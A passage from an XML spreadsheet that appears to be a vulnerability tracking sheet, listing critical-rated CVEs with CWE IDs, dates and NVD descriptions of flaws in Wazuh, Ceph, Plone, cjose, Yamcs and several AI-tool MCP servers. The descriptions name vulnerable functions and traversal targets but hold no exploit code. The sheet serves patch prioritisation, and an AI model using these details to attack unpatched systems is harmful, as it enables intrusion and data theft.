          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47702</t>
        </is>
      </c>
    </row>
    <row r="636">
      <c r="A636" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B636" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48024</t>
        </is>
      </c>
      <c r="C636" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D636" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E636" s="5" t="inlineStr"/>
      <c r="F636" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G636" s="5" t="inlineStr"/>
      <c r="H636" s="5" t="inlineStr"/>
      <c r="I636" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J636" s="5" t="inlineStr"/>
      <c r="K636" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L636" s="5" t="inlineStr">
        <is>
          <t>Wazuh is a free and open source platform used for threat prevention, detection, and response. From 4.0.0 until 4.14.6 and 5.0.0-beta3, cluster.unmerge_info() in framework/wazuh/core/cluster/cluster.py constructs paths from peer-controlled merge_type and name values in a merged synchronization archive. process_files_from_worker() in framework/wazuh/core/cluster/master.py does not adequately confine the resulting path to the declared cluster item directory. A cluster peer holding the shared Fernet key can use traversal in files_metadata.json or a merged-file header to write files such as /var/ossec/etc/ossec.conf. Replacing ossec.conf can configure root-executed commands and lead to code execution when Wazuh services reload. This issue is fixed in versions 4.14.6 and 5.0.0-beta3.</t>
        </is>
      </c>
      <c r="M636" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48024</t>
        </is>
      </c>
    </row>
    <row r="637">
      <c r="A637" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B637" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48031</t>
        </is>
      </c>
      <c r="C637" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D637" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E637" s="5" t="inlineStr"/>
      <c r="F637" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G637" s="5" t="inlineStr">
        <is>
          <t>postgresql</t>
        </is>
      </c>
      <c r="H637" s="5" t="inlineStr"/>
      <c r="I637" s="5" t="inlineStr">
        <is>
          <t>2026-08-03</t>
        </is>
      </c>
      <c r="J637" s="5" t="inlineStr"/>
      <c r="K637" s="5" t="inlineStr">
        <is>
          <t>CWE-798</t>
        </is>
      </c>
      <c r="L637" s="5" t="inlineStr">
        <is>
          <t>go-base is a Go RESTful API Boilerplate template with JWT Authentication, backed by PostgreSQL. In versions prior to 2026-05-18, the JWT signing secret is hardcoded to the known string "random", letting any attacker who reads the public repository forge tokens for arbitrary users, including admin roles, and completely bypass authentication on all protected endpoints. This value is set in two places: the dev.env template (line 10) and a programmatic fallback in cmd/serve.go (line 35), so the application uses it even when no .env file is present. The original mitigation in auth/jwt/tokenauth.go (lines 22 to 25) only caught the exact string "random", letting other weak secrets through, and replaced it with an in-memory key that was not persisted, invalidating all tokens on every restart and effectively causing a denial-of-service. This issue has been fixed in version 2026-05-18.</t>
        </is>
      </c>
      <c r="M637" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48031</t>
        </is>
      </c>
    </row>
    <row r="638">
      <c r="A638" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B638" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48039</t>
        </is>
      </c>
      <c r="C638" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D638" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E638" s="5" t="inlineStr"/>
      <c r="F638" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G638" s="5" t="inlineStr"/>
      <c r="H638" s="5" t="inlineStr"/>
      <c r="I638" s="5" t="inlineStr">
        <is>
          <t>2026-08-07</t>
        </is>
      </c>
      <c r="J638" s="5" t="inlineStr"/>
      <c r="K638" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="L638" s="5" t="inlineStr">
        <is>
          <t>Meta Ads MCP is a Model Context Protocol (MCP) server that lets AI assistants run Meta Ads. Prior to version 1.0.109, `AuthInjectionMiddleware.dispatch()` at `http_auth_integration.py:272` unconditionally forwards unauthenticated Streamable HTTP requests to downstream MCP tool handlers without issuing a `401` response, allowing any network-reachable caller to invoke MCP tools without authentication. When no per-request credential is present, tool handlers fall back to the `META_ACCESS_TOKEN` environment variable, and when the downstream Meta Graph API call fails, `api.py:263–269` serialises the raw `httpx` request URL—including the operator's `access_token` as a query parameter—into the JSON-RPC response body, delivering the credential to the unauthenticated caller. Version 1.0.109 fixes the issue.</t>
        </is>
      </c>
      <c r="M638" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48039</t>
        </is>
      </c>
    </row>
    <row r="639">
      <c r="A639" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B639" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48162</t>
        </is>
      </c>
      <c r="C639" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D639" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E639" s="5" t="inlineStr"/>
      <c r="F639" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G639" s="5" t="inlineStr"/>
      <c r="H639" s="5" t="inlineStr"/>
      <c r="I639" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J639" s="5" t="inlineStr"/>
      <c r="K639" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="L639" s="5" t="inlineStr">
        <is>
          <t>Wazuh is a free and open source platform used for threat prevention, detection, and response. From 4.0.0 until 4.14.6 and 5.0.0-beta3, DistributedAPI.send_tmp_file() in framework/wazuh/core/cluster/dapi/dapi.py joins an attacker-controlled tmp_file value to WAZUH_PATH without canonicalization or confinement. A cluster peer holding the shared Fernet key can use traversal or an absolute path to make the master return any readable file over the cluster channel. Reading /var/ossec/api/configuration/security/private_key.pem allows the peer to forge administrator REST API tokens offline and then exercise administrative privileges without creating an account. This issue is fixed in versions 4.14.6 and 5.0.0-beta3.</t>
        </is>
      </c>
      <c r="M639" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48162</t>
        </is>
      </c>
    </row>
    <row r="640">
      <c r="A640" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B640" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49364</t>
        </is>
      </c>
      <c r="C640" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D640" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E640" s="5" t="inlineStr"/>
      <c r="F640" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G640" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H640" s="5" t="inlineStr"/>
      <c r="I640" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J640" s="5" t="inlineStr"/>
      <c r="K640" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L640" s="5" t="inlineStr">
        <is>
          <t>An unauthenticated network-adjacent attacker can leverage discovery to capture cluster administrative credentials during the initial cluster connection handshake.
This issue affects Apache Artemis: from 2.50.0 through 2.56.0; Apache ActiveMQ Artemis: from 1.0.0 through 2.44.0.
Users are recommended to upgrade to version 2.57.0, which fixes the issue.</t>
        </is>
      </c>
      <c r="M640" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49364</t>
        </is>
      </c>
    </row>
    <row r="641">
      <c r="A641" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B641" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49441</t>
        </is>
      </c>
      <c r="C641" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D641" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E641" s="5" t="inlineStr"/>
      <c r="F641" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G641" s="5" t="inlineStr"/>
      <c r="H641" s="5" t="inlineStr"/>
      <c r="I641" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J641" s="5" t="inlineStr"/>
      <c r="K641" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="L641" s="5" t="inlineStr">
        <is>
          <t>Wazuh is a free and open source platform used for threat prevention, detection, and response. From 4.3.0 until 4.14.6 and 5.0.0-beta3, the non-merged branch of process_files_from_worker() in framework/wazuh/core/cluster/master.py trusts a peer-controlled file_path key from files_metadata.json. The destination is joined to WAZUH_PATH without proving that it remains inside the directory selected by cluster_item_key. A cluster peer holding the shared Fernet key can upload a crafted extra-valid archive and overwrite security-sensitive files such as /var/ossec/etc/ossec.conf. Replacing ossec.conf can configure root-executed commands and lead to code execution after a service reload. This issue is fixed in versions 4.14.6 and 5.0.0-beta3.</t>
        </is>
      </c>
      <c r="M641" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49441</t>
        </is>
      </c>
    </row>
    <row r="642">
      <c r="A642" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B642" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49849</t>
        </is>
      </c>
      <c r="C642" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D642" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E642" s="5" t="inlineStr"/>
      <c r="F642" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G642" s="5" t="inlineStr"/>
      <c r="H642" s="5" t="inlineStr"/>
      <c r="I642" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J642" s="5" t="inlineStr"/>
      <c r="K642" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="L642" s="5" t="inlineStr">
        <is>
          <t>xShop is an open-source shop developed in Laravel. An Unrestricted File Upload vulnerability in xShop version 3.0.3 allows an authenticated administrator to upload executable files (e.g., .php). By uploading a specially crafted php file, an attacker can achieve Remote Code Execution (RCE) on the server, leading to a full system compromise. Version 3.0.4 fixes the issue.</t>
        </is>
      </c>
      <c r="M642" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49849</t>
        </is>
      </c>
    </row>
    <row r="643">
      <c r="A643" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B643" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50152</t>
        </is>
      </c>
      <c r="C643" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D643" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E643" s="5" t="inlineStr"/>
      <c r="F643" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G643" s="5" t="inlineStr"/>
      <c r="H643" s="5" t="inlineStr"/>
      <c r="I643" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J643" s="5" t="inlineStr"/>
      <c r="K643" s="5" t="inlineStr">
        <is>
          <t>CWE-285</t>
        </is>
      </c>
      <c r="L643" s="5" t="inlineStr">
        <is>
          <t>Ceph is an open-source distributed storage platform providing object, block, and file storage. In versions prior to 20.2.4 and 19.2.6, the Monitor subscription handler fails to properly authorize access to the configuration-key store, allowing any CephX user with only  `mon allow r` capabilities to read the entire store by sending a single crafted MMonSubscribe message. The config-key store holds sensitive secrets including OSD LUKS disk-encryption passphrases and, on cephadm-managed clusters, the SSH private key that cephadm uses to reach every host in the cluster. Because that key grants root on every node under the default cephadm configuration, a low-privileged read-only account can escalate to full cluster and host compromise. This issue is fixed in versions 20.2.4 and 19.2.6</t>
        </is>
      </c>
      <c r="M643" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50152</t>
        </is>
      </c>
    </row>
    <row r="644">
      <c r="A644" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B644" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-51346</t>
        </is>
      </c>
      <c r="C644" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D644" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E644" s="5" t="inlineStr"/>
      <c r="F644" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G644" s="5" t="inlineStr"/>
      <c r="H644" s="5" t="inlineStr"/>
      <c r="I644" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J644" s="5" t="inlineStr"/>
      <c r="K644" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L644" s="5" t="inlineStr">
        <is>
          <t>SQL Injection vulnerability in StudIP 6.0.x before 6.0.3 and 5.4.x before 5.4.12 allows a remote attacker to execute arbitrary code and obtain sensitive information via the store() functions.</t>
        </is>
      </c>
      <c r="M644" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-51346</t>
        </is>
      </c>
    </row>
    <row r="645">
      <c r="A645" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B645" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52723</t>
        </is>
      </c>
      <c r="C645" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D645" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E645" s="5" t="inlineStr"/>
      <c r="F645" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G645" s="5" t="inlineStr"/>
      <c r="H645" s="5" t="inlineStr"/>
      <c r="I645" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J645" s="5" t="inlineStr"/>
      <c r="K645" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="L645" s="5" t="inlineStr">
        <is>
          <t>ePA 3.x Integration implements the authorization workflow and writes Medical Information Objects to Germany's electronic patient record. Prior to 1.3.0, ePA 3.x Integration performs VAU server certificate validation in app/vau/VAUProtokoll.py without anchoring the signed_vau_server_pub_keys and AUT_VAU_CertData certificate path to independent trusted material. A network-positioned attacker between the DiGA backend and the ePA system can intercept the VAU handshake, supply attacker-controlled certificate and key material, and satisfy the circular trust relationship. Because TLS certificate verification is also disabled in affected versions, no independent server-authentication layer prevents the attack. The attacker can impersonate the VAU server, control the negotiated session keys, and read or modify all encrypted VAU traffic. This issue is fixed in version 1.3.0.</t>
        </is>
      </c>
      <c r="M645" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52723</t>
        </is>
      </c>
    </row>
    <row r="646">
      <c r="A646" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B646" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52766</t>
        </is>
      </c>
      <c r="C646" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D646" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E646" s="5" t="inlineStr"/>
      <c r="F646" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G646" s="5" t="inlineStr"/>
      <c r="H646" s="5" t="inlineStr"/>
      <c r="I646" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J646" s="5" t="inlineStr"/>
      <c r="K646" s="5" t="inlineStr">
        <is>
          <t>CWE-276, CWE-862</t>
        </is>
      </c>
      <c r="L646" s="5" t="inlineStr">
        <is>
          <t>YesWiki is a wiki system written in PHP. Prior to version 4.6.6, the {{erasespamedcomments}} wiki action (actions/EraseSpamedCommentsAction.php) accepts a suppr[] array from POST and deletes every wiki page whose tag appears in that array, with no authorization check anywhere in the action body or in the page-deletion path it invokes. Combined with YesWiki's allow-by-default action ACL model, any user who has page write access, which is the default for everyone (default_write_acl='*') on a fresh install can permanently delete arbitrary wiki pages, including the front page, admin pages, and pages owned by other users. This issue has been patched in version 4.6.6.</t>
        </is>
      </c>
      <c r="M646" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52766</t>
        </is>
      </c>
    </row>
    <row r="647">
      <c r="A647" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B647" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53793</t>
        </is>
      </c>
      <c r="C647" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D647" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E647" s="5" t="inlineStr"/>
      <c r="F647" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G647" s="5" t="inlineStr"/>
      <c r="H647" s="5" t="inlineStr"/>
      <c r="I647" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J647" s="5" t="inlineStr"/>
      <c r="K647" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="L647" s="5" t="inlineStr">
        <is>
          <t>rsync before 3.5.0 contains a path confinement bypass vulnerability that allows remote clients to escape the intended inner-module root confinement by constructing paths that resolve outside the chroot boundary when the module root contains a /./ boundary marker. Attackers can exploit improper handling of the /./ notation or forge delta-basis transfers referencing xname paths that cross the /./ boundary to gain unauthorized read or write access to files outside the module's subtree.</t>
        </is>
      </c>
      <c r="M647" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53793</t>
        </is>
      </c>
    </row>
    <row r="648">
      <c r="A648" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B648" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53939</t>
        </is>
      </c>
      <c r="C648" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D648" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E648" s="5" t="inlineStr"/>
      <c r="F648" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G648" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H648" s="5" t="inlineStr"/>
      <c r="I648" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J648" s="5" t="inlineStr"/>
      <c r="K648" s="5" t="inlineStr">
        <is>
          <t>CWE-321, CWE-330</t>
        </is>
      </c>
      <c r="L648" s="5" t="inlineStr">
        <is>
          <t>OpenIDC/cjose is a C library implementing the Javascript Object Signing and Encryption (JOSE). In versions 0.6.1 through 0.6.2.5, when cjose encrypts a JWE using an AES-CBC-HMAC content-encryption algorithm (`A128CBC-HS256`, `A192CBC-HS384`, or `A256CBC-HS512`) together with any key-management algorithm that generates a fresh content-encryption key (CEK), the CEK is all zero bytes instead of being randomly generated. The resulting JWE is therefore encrypted and authenticated under a fixed, publicly known key, so anyone who obtains the JWE can recover the plaintext and forge or modify the content. This is fixed in version 0.6.2.6 by `_cjose_jwe_set_cek_aes_cbc()` generating the CEK from `RAND_bytes`. A regression test asserts that the `encrypted_key` differs across two encryptions for each AES-CBC-HMAC variant. Until upgrading, for data encrypted with cjose, three options are available. Use an AES-GCM `enc` (`A128GCM` / `A192GCM` / `A256GCM`) instead of an AES-CBC-HMAC `enc`,  use `alg=dir` with a caller-supplied CEK, or avoid using cjose for JWE encryption with the affected algorithm pair. These are mitigations for new ciphertexts only; data already encrypted under the zero key remains compromised and should be re-encrypted (and any secrets it contained rotated).</t>
        </is>
      </c>
      <c r="M648" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53939</t>
        </is>
      </c>
    </row>
    <row r="649">
      <c r="A649" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B649" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55247</t>
        </is>
      </c>
      <c r="C649" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D649" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E649" s="5" t="inlineStr"/>
      <c r="F649" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G649" s="5" t="inlineStr"/>
      <c r="H649" s="5" t="inlineStr"/>
      <c r="I649" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J649" s="5" t="inlineStr"/>
      <c r="K649" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L649" s="5" t="inlineStr">
        <is>
          <t>plone.app.event provides the event content type for Plone. Prior to versions 5.2.4 and 6.0.1, the iCalendar import in src/plone/app/event/ical/importer.py accepts insufficiently restricted calendar and event URLs, does not adequately bound downloaded bytes or imported events, and commits work per event. A logged-in editor can make the server request internal network resources or local calendar files, exhaust resources and take the site offline, and store a malicious event URL that executes script in another user's browser. The fix restricts accepted URLs, applies MAXIMUM_ICAL_IMPORT_SIZE_BYTES and MAXIMUM_ICAL_IMPORT_EVENTS limits, uses transaction savepoints, and validates event URLs. This issue is fixed in versions 5.2.4 and 6.0.1.</t>
        </is>
      </c>
      <c r="M649" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55247</t>
        </is>
      </c>
    </row>
    <row r="650">
      <c r="A650" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B650" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55248</t>
        </is>
      </c>
      <c r="C650" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D650" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E650" s="5" t="inlineStr"/>
      <c r="F650" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G650" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H650" s="5" t="inlineStr"/>
      <c r="I650" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J650" s="5" t="inlineStr"/>
      <c r="K650" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L650" s="5" t="inlineStr">
        <is>
          <t>plone.app.portlets provides portlets and a Plone-specific user interface for plone.portlets. Prior to 5.0.8, 6.0.4, and 7.0.2, a member who can add an RSS portlet can set its feed URL to a very large response, causing src/plone/app/portlets/portlets/rss.py to download and retain excessive data in memory and deny service. The same RSS URL handling accepts internal hosts, IP addresses, single-word domains, and explicit ports, allowing server-side requests that can probe internal network services and open ports. A malicious feed item can also supply a JavaScript URL that is retained as the item link and can execute script when used by a victim. The affected logic includes _rss_feed_url_validator, _normal_url_validator, RSSFeed._retrieveFeed, RSSFeed._buildItemDict, and the FEED_DATA in-memory cache. This issue is fixed in versions 5.0.8, 6.0.4, and 7.0.2.</t>
        </is>
      </c>
      <c r="M650" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55248</t>
        </is>
      </c>
    </row>
    <row r="651">
      <c r="A651" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B651" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55511</t>
        </is>
      </c>
      <c r="C651" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D651" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E651" s="5" t="inlineStr"/>
      <c r="F651" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G651" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H651" s="5" t="inlineStr"/>
      <c r="I651" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J651" s="5" t="inlineStr"/>
      <c r="K651" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L651" s="5" t="inlineStr">
        <is>
          <t>Yamcs is a mission control framework. Prior to 5.12.8 and 5.13.2, Yamcs allows a user with SystemPrivilege.ControlArchiving to create a double-quoted StreamSQL column name that is interpolated into generated Java source by Expression.fillCode_InputDefVars and Expression.sanitizeName. A sum aggregate reaches yamcs-core/src/main/java/org/yamcs/yarch/streamsql/CompilableAggregateExpression.java and yamcs-core/src/main/java/org/yamcs/yarch/streamsql/funct/SumExpression.java through SelectExpression.compile, where Janino SimpleCompiler.cook compiles the injected source. POST /api/archive/{instance}:executeSql can therefore execute arbitrary Java in the Yamcs server process, exposing mission data and credentials and permitting telemetry tampering or denial of service. This issue is fixed in versions 5.12.8 and 5.13.2.</t>
        </is>
      </c>
      <c r="M651" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55511</t>
        </is>
      </c>
    </row>
    <row r="652">
      <c r="A652" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B652" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55536</t>
        </is>
      </c>
      <c r="C652" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D652" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E652" s="5" t="inlineStr"/>
      <c r="F652" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G652" s="5" t="inlineStr"/>
      <c r="H652" s="5" t="inlineStr"/>
      <c r="I652" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J652" s="5" t="inlineStr"/>
      <c r="K652" s="5" t="inlineStr">
        <is>
          <t>CWE-284, CWE-625</t>
        </is>
      </c>
      <c r="L652" s="5" t="inlineStr">
        <is>
          <t>PraisonAI is a multi-agent teams system. Prior to praisonai 4.6.58, Browser Server _handle_connection() checks Chrome extension origins with re.match() and the unanchored expression chrome-extension://[a-z0-9]{32}. Extra trailing characters pass before websocket.accept(), allowing start_session commands and unauthorized browser automation. This issue is fixed in version 4.6.58.</t>
        </is>
      </c>
      <c r="M652" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55536</t>
        </is>
      </c>
    </row>
    <row r="653">
      <c r="A653" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B653" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55640</t>
        </is>
      </c>
      <c r="C653" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D653" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E653" s="5" t="inlineStr"/>
      <c r="F653" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G653" s="5" t="inlineStr"/>
      <c r="H653" s="5" t="inlineStr"/>
      <c r="I653" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J653" s="5" t="inlineStr"/>
      <c r="K653" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L653" s="5" t="inlineStr">
        <is>
          <t>Nextcloud MCP Server is a production-ready MCP server that connects AI assistants to a Nextcloud instance. Prior to 0.117.2, the POST /webhooks/nextcloud endpoint in nextcloud_mcp_server/vector/webhook_receiver.py has no authentication by default because WEBHOOK_SECRET defaults to None and startup validation does not require it. When WEBHOOK_SECRET is unset, handle_nextcloud_webhook() accepts unauthenticated requests. The payload["user"]["uid"] field parsed in nextcloud_mcp_server/vector/webhook_parser.py is attacker-controlled and is used without an authenticated-session cross-check for Qdrant operations, allowing a network attacker to delete or trigger re-indexing of vector embeddings for any user and to destroy the semantic search index by sending forged deletion events. This issue is fixed in version 0.117.2.</t>
        </is>
      </c>
      <c r="M653" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55640</t>
        </is>
      </c>
    </row>
    <row r="654">
      <c r="A654" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B654" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57499</t>
        </is>
      </c>
      <c r="C654" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D654" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E654" s="5" t="inlineStr"/>
      <c r="F654" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="G654" s="5" t="inlineStr"/>
      <c r="H654" s="5" t="inlineStr"/>
      <c r="I654" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="J654" s="5" t="inlineStr"/>
      <c r="K654" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-78</t>
        </is>
      </c>
      <c r="L654" s="5" t="inlineStr">
        <is>
